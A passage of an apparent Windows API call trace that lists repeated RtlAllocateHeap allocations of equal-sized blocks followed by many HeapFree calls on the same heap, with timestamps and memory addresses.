0x3832f30 [0081.381] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3846140 [0081.382] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3859350 [0081.382] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x386c560 [0081.383] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x387f770 [0081.383] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3892980 [0081.384] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x38a5b90 [0081.384] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x38b8da0 [0081.384] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x38cbfb0 [0081.385] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x38df1c0 [0081.385] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x38f23d0 [0081.386] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x39055e0 [0081.386] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x39187f0 [0081.386] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x392ba00 [0081.387] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x393ec10 [0081.387] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3951e20 [0081.387] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3965030 [0081.388] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3978240 [0081.388] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x398b450 [0081.388] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x399e660 [0081.389] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x39b1870 [0081.389] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x39c4a80 [0081.389] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x39d7c90 [0081.389] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x39eaea0 [0081.390] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x39fe0b0 [0081.390] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3a112c0 [0081.391] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3a244d0 [0081.391] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3a376e0 [0081.392] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3a4a8f0 [0081.392] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3a5db00 [0081.392] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3a70d10 [0081.392] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3a83f20 [0081.393] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3a97130 [0081.393] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3aaa340 [0081.394] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3abd550 [0081.394] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3ad0760 [0081.394] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13200) returned 0x3ae3970 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5e7420 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x607220 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x61a430 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x62d640 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x640850 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x653a60 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x666c70 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x679e80 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x68d090 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1ed0080 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1ee3290 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1ef64a0 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1f096b0 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1f1c8c0 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1f2fad0 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1f42ce0 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1f55ef0 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1f69100 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1f7c310 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1f8f520 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1fa2730 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1fd0080 | out: hHeap=0x5b0000) returned 1 [0086.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1fe3290 | out: hHeap=0x5b0000) returned 1 [0086.013] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x1ff64a0 | out: hHeap=0x5b0000) returned 1 [0086.013] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x20096b0 | out: hHeap=0x5b0000) returned 1 [0086.013] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x201c8c0 | out: hHeap=0x5b0000) returned 1 [0086.187] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x202fad0 | out: hHeap=0x5b0000) returned 1 [0086.188] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2042ce0 | out: hHeap=0x5b0000) returned 1 [0086.188] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2055ef0 | out: hHeap=0x5b0000) returned 1 [0086.188] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2069100 | out: hHeap=0x5b0000) returned 1 [0086.188] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x207c310 | out: hHeap=0x5b0000) returned 1 [0086.188] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x208f520 | out: hHeap=0x5b0000) returned 1 [0086.188] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x20a2730 | out: hHeap=0x5b0000) returned 1 [0086.188] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x20b5940 | out: hHeap=0x5b0000) returned 1 [0086.188] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x20c8b50 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x20dbd60 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x20eef70 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2102180 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2115390 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x21285a0 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x213b7b0 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x214e9c0 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2161bd0 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2174de0 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2187ff0 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x219b200 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x21ae410 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x21d0080 | out: hHeap=0x5b0000) returned 1 [0086.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x21e3290 | out: hHeap=0x5b0000) returned 1 [0086.197] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x21f64a0 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x22096b0 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x221c8c0 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x222fad0 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2242ce0 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2255ef0 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2269100 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x227c310 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x228f520 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x22a2730 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x22b5940 | out: hHeap=0x5b0000) returned 1 [0086.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x22c8b50 | out: hHeap=0x5b0000) returned 1 [0086.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x22dbd60 | out: hHeap=0x5b0000) returned 1 [0086.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x22eef70 | out: hHeap=0x5b0000) returned 1 [0086.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2302180 | out: hHeap=0x5b0000) returned 1 [0086.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2315390 | out: hHeap=0x5b0000) returned 1 [0086.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x23285a0 | out: hHeap=0x5b0000) returned 1 [0086.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x233b7b0 | out: hHeap=0x5b0000) returned 1 [0086.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x234e9c0 | out: hHeap=0x5b0000) returned 1 [0086.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2361bd0 | out: hHeap=0x5b0000) returned 1 [0086.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2374de0 | out: hHeap=0x5b0000) returned 1 [0086.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2387ff0 | out: hHeap=0x5b0000) returned 1 [0086.212] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x239b200 | out: hHeap=0x5b0000) returned 1 [0086.214] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x23ae410 | out: hHeap=0x5b0000) returned 1 [0086.214] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x23c1620 | out: hHeap=0x5b0000) returned 1 [0086.214] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x23d4830 | out: hHeap=0x5b0000) returned 1 [0086.365] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x23e7a40 | out: hHeap=0x5b0000) returned 1 [0086.365] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x23fac50 | out: hHeap=0x5b0000) returned 1 [0086.365] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x240de60 | out: hHeap=0x5b0000) returned 1 [0086.365] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2421070 | out: hHeap=0x5b0000) returned 1 [0086.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2434280 | out: hHeap=0x5b0000) returned 1 [0086.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2447490 | out: hHeap=0x5b0000) returned 1 [0086.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x245a6a0 | out: hHeap=0x5b0000) returned 1 [0086.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x246d8b0 | out: hHeap=0x5b0000) returned 1 [0086.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2480ac0 | out: hHeap=0x5b0000) returned 1 [0086.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2493cd0 | out: hHeap=0x5b0000) returned 1 [0086.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x24a6ee0 | out: hHeap=0x5b0000) returned 1 [0086.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x24ba0f0 | out: hHeap=0x5b0000) returned 1 [0086.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x24cd300 | out: hHeap=0x5b0000) returned 1 [0086.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x24e0510 | out: hHeap=0x5b0000) returned 1 [0086.372] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x24f3720 | out: hHeap=0x5b0000) returned 1 [0086.372] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2506930 | out: hHeap=0x5b0000) returned 1 [0086.373] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2519b40 | out: hHeap=0x5b0000) returned 1 [0086.373] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x252cd50 | out: hHeap=0x5b0000) returned 1 [0086.373] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x253ff60 | out: hHeap=0x5b0000) returned 1 [0086.373] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2553170 | out: hHeap=0x5b0000) returned 1 [0086.373] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2566380 | out: hHeap=0x5b0000) returned 1 [0086.373] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2579590 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x258c7a0 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x259f9b0 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x25b2bc0 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x25d0080 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x25e3290 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x25f64a0 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x26096b0 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x261c8c0 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x262fad0 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2642ce0 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2655ef0 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2669100 | out: hHeap=0x5b0000) returned 1 [0086.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x267c310 | out: hHeap=0x5b0000) returned 1 [0086.383] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x268f520 | out: hHeap=0x5b0000) returned 1 [0086.385] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x26a2730 | out: hHeap=0x5b0000) returned 1 [0086.385] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x26b5940 | out: hHeap=0x5b0000) returned 1 [0086.385] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x26c8b50 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x26dbd60 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x26eef70 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2702180 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2715390 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x27285a0 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x273b7b0 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x274e9c0 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2761bd0 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2774de0 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2787ff0 | out: hHeap=0x5b0000) returned 1 [0086.389] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x279b200 | out: hHeap=0x5b0000) returned 1 [0086.390] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x27ae410 | out: hHeap=0x5b0000) returned 1 [0086.390] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x27c1620 | out: hHeap=0x5b0000) returned 1 [0086.390] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x27d4830 | out: hHeap=0x5b0000) returned 1 [0086.396] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x27e7a40 | out: hHeap=0x5b0000) returned 1 [0086.397] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x27fac50 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x280de60 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2821070 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2834280 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2847490 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x285a6a0 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x286d8b0 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2880ac0 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2893cd0 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x28a6ee0 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x28ba0f0 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x28cd300 | out: hHeap=0x5b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x28e0510 | out: hHeap=0x5b0000) returned 1 [0086.612] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x28f3720 | out: hHeap=0x5b0000) returned 1 [0086.612] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2906930 | out: hHeap=0x5b0000) returned 1 [0086.612] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2919b40 | out: hHeap=0x5b0000) returned 1 [0086.612] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x292cd50 | out: hHeap=0x5b0000) returned 1 [0086.614] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x293ff60 | out: hHeap=0x5b0000) returned 1 [0086.615] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2953170 | out: hHeap=0x5b0000) returned 1 [0086.615] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2966380 | out: hHeap=0x5b0000) returned 1 [0086.615] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2979590 | out: hHeap=0x5b0000) returned 1 [0086.615] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x298c7a0 | out: hHeap=0x5b0000) returned 1 [0086.615] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x299f9b0 | out: hHeap=0x5b0000) returned 1 [0086.615] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x29b2bc0 | out: hHeap=0x5b0000) returned 1 [0086.615] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x29c5dd0 | out: hHeap=0x5b0000) returned 1 [0086.615] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x29d8fe0 | out: hHeap=0x5b0000) returned 1 [0086.615] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x29ec1f0 | out: hHeap=0x5b0000) returned 1 [0086.622] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x29ff400 | out: hHeap=0x5b0000) returned 1 [0086.622] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2a12610 | out: hHeap=0x5b0000) returned 1 [0086.622] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2a25820 | out: hHeap=0x5b0000) returned 1 [0086.622] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2a38a30 | out: hHeap=0x5b0000) returned 1 [0086.622] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2a4bc40 | out: hHeap=0x5b0000) returned 1 [0086.625] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2a5ee50 | out: hHeap=0x5b0000) returned 1 [0086.626] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2a72060 | out: hHeap=0x5b0000) returned 1 [0086.626] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2a85270 | out: hHeap=0x5b0000) returned 1 [0086.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2a98480 | out: hHeap=0x5b0000) returned 1 [0086.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2aab690 | out: hHeap=0x5b0000) returned 1 [0086.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2abe8a0 | out: hHeap=0x5b0000) returned 1 [0086.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2ad1ab0 | out: hHeap=0x5b0000) returned 1 [0086.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2ae4cc0 | out: hHeap=0x5b0000) returned 1 [0086.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2af7ed0 | out: hHeap=0x5b0000) returned 1 [0086.631] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2b0b0e0 | out: hHeap=0x5b0000) returned 1 [0086.631] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2b1e2f0 | out: hHeap=0x5b0000) returned 1 [0086.632] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2b31500 | out: hHeap=0x5b0000) returned 1 [0086.632] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2b44710 | out: hHeap=0x5b0000) returned 1 [0086.632] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2b57920 | out: hHeap=0x5b0000) returned 1 [0086.632] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2b6ab30 | out: hHeap=0x5b0000) returned 1 [0086.636] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2b7dd40 | out: hHeap=0x5b0000) returned 1 [0086.637] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2b90f50 | out: hHeap=0x5b0000) returned 1 [0086.637] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2ba4160 | out: hHeap=0x5b0000) returned 1 [0086.637] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2bb7370 | out: hHeap=0x5b0000) returned 1 [0086.637] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2bca580 | out: hHeap=0x5b0000) returned 1 [0086.637] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2bdd790 | out: hHeap=0x5b0000) returned 1 [0086.637] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2bf09a0 | out: hHeap=0x5b0000) returned 1 [0086.637] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2c03bb0 | out: hHeap=0x5b0000) returned 1 [0086.641] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2c16dc0 | out: hHeap=0x5b0000) returned 1 [0086.641] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2c29fd0 | out: hHeap=0x5b0000) returned 1 [0086.641] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2c3d1e0 | out: hHeap=0x5b0000) returned 1 [0086.641] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2c503f0 | out: hHeap=0x5b0000) returned 1 [0086.642] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2c63600 | out: hHeap=0x5b0000) 